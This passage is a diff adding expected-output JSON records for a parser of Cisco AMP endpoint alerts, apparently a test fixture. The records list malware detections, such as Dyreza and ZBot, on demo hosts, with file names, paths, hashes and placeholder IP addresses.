"@timestamp": "2021-01-15T10:11:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257413683872000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 294937, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 267000000, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1489955900267000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:10:59.000Z", + "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "input.type": "log", + "log.offset": 296255, + "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "related.hash": [ + "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:56.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257357849296955", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 607000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257357849297000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 297536, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667064295456780", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667064295457000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 298855, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257340669427770", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 988000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257340669428000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 300181, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667055705522187", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 565000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667055705522000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 301500, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b2:4b:d5:c2:a6:9f" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "ZBot:FakeAlert-tpd", + "cisco.amp.detection_id": "5832268410590855181", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b2:4b:d5:c2:a6:9f" + ], + "cisco.amp.timestamp_nanoseconds": 13000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5832268414885822000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", + "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", + "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "file.name": "2_3756858138.exe", + "file.path": "\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Zbot", + "host.name": "Demo_Zbot", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 302825, + "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", + "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", + "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", + "process.name": "a.exe", + "process.pid": 3020, + "related.hash": [ + "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "e74f1b3fffc4ae61e077bbdec3230e95", + "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + ], + "related.hosts": [ + "Demo_Zbot" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b2:4b:d5:c2:a6:9f" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "ZBot:FakeAlert-tpd", + "cisco.amp.detection_id": "5832268410590855180", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b2:4b:d5:c2:a6:9f" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5832268410590855000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", + "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", + "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "file.name": "2_3756858138.exe", + "file.path": "\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Zbot", + "host.name": "Demo_Zbot", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 304431, + "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", + "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", + "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", + "process.name": "a.exe", + "process.pid": 3020, + "related.hash": [ + "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "e74f1b3fffc4ae61e077bbdec3230e95", + "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + ], + "related.hosts": [ + "Demo_Zbot" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257087266357305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 942000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257087266357000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 307596, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666798007484426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 469000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666798007484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 308915, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666793712517128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 948000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666793712517000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 311551, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666785122582535", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 372000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666785122583000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 312869, + "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", + "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", + "process.name": "rundll32.exe", + "process.pid": 596, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:42.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257040021717048", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 304000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257040021717000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 314451, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 292000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176256988482109000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 315770, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666703518204000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 317089, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 